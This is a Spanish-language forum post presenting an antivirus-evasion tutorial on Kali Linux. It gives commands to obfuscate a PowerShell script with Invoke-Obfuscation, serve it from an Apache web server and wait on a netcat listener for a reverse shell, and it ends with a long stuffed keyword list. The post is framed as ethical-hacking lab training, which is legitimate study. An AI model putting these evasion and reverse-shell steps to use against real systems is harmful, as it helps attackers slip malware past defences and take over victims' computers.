COMO EVADIR ANTIVIRUS para HACKEAR | Kali Linux Seguridad Informática

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

COMO EVADIR ANTIVIRUS para HACKEAR | Kali Linux Seguridad Informática

#1

Mensaje por admin »

La evasión de defensa consiste en técnicas en que los atacantes utilizan para evitar su detección durante el ataque. Las técnicas utilizadas para la evasión de Antivirus incluyen la desinstalación/desactivación del software de seguridad o la ofuscación/cifrado de datos y secuencias de comandos. Los atacantes también aprovechan y abusan de los procesos para ocultar y enmascarar su malware.

Imagen
 
LINKS o ENLACES IMPORTANTES

https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/swisskyrepo/Payloads ... powershell
https://hackersploit.org/windows-red-te ... echniques/

COMANDOS UTILIZADOS

Código: Seleccionar todo

Clonar el repositorio
git clone https://github.com/danielbohannon/Invoke-Obfuscation

Instalar powershell en kali linux

sudo apt-get install powershell -y

para acceder tenemos que poner

pwsh


Import-Module ./Invoke-Obfuscation.psd1


Invoke-Obfuscation


nano script.ps1


SET SCRIPTPATH /home/rogerio24/script.ps1


Seleccionamos el tipo de metodo de ofuscacion o de encyptacion o ocultacion
AST


Aca seleccionamos todos
ALL


Confirmamos y listo
1


nano ejecutar.ps1



mv ejecutar.ps1 /var/www/html/ejecutar.ps1

service apache2 status

service apache2 start

-----------------------------------------------------------

Listener en Kali Linux

nc -nvlp 1234
LABORATORIO de TRABAJO

Imagen
 

VIDEO TUTORIAL



Como Acceder con Shellter y Invoke-Obfuscation PowerShell v2.0+ compatible PowerShell linux for ethical hackers como usar kali linux, explotar vulnerabilidades con metasploit acceder a windows con metasploit acceder a windows acceder graficamente a windows desde kali linux acceder remotamente a windows information systems security professional metasploit ataque a windows proteger computadoras penetration tests oscp certification Security Technologies Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Unauthenticated LAN Remote Code Execution Wordlist Reverse connection Shell backdoor LAN | Local Area Network CMD execution How to Exploit and Test this Critical Vulnerability ransomware attackers repository Netcat Listener Exploit Code NC Virtual machine maquina virtua NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide how to get in Terminal Hashcat python blue team Dynamic Shellcode Injection Windows Red Team red team Windows Bug mfsconsole vulnerabilidades de seguridad detección de intrusos Networking Hash scripts cifrado descrifrar Defense Evasion With Shellter Obfuscation Encoding Mitre Packing Crypters AV Evasion Methods Penetration Testing Malware Analysis shellcode PE FILES Ethical Hacker, Penetration Tester Cybersecurity Consultant learn security unix try hack me hacking ctf for beginners Linux Ubuntu ehtical hacking cyber seguridad linux for ethical hackers capacitacion educacion How Hackers Do It cyber security remote function Injecting Shellcode into Portable Executables cyber seguridad security tool linux for ethical hackers capacitacion educacion How Hackers Do It cyber security tutorial comandos commands remote function laboratorio testing servidor como escalar privilegios en windows o linux kernel vulnerable CVE Setting Up Invoke-Obfuscation On Kali remote function hacker exploit hacking kali linux red teaming what is a red team red team exploitation red team initial access powershell empire tutorial powershell empire macro red team defense evasion av evasion av evasion 2023 powershell obfuscation red team windows Ethical Hacker Penetration Tester Cybersecurity Consultant learn security unix try hack me ctf for beginners ehtical hacking programa informatico,computerscienceinformationsecurity,cyber seguridad,reverse shell tutorialcopy files powershell,cybersecurity consultant,learn security,oscp certification,information systems security professional,laboratorio,linux for ethical hackers,cyber security,how hackers do it,como usar kali linux,servidor,tutorial,security,powershell file transfer,como escalar privilegios en windows o linux,capacitacion,ethical hacker,ehtical hacking
 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 1 invitado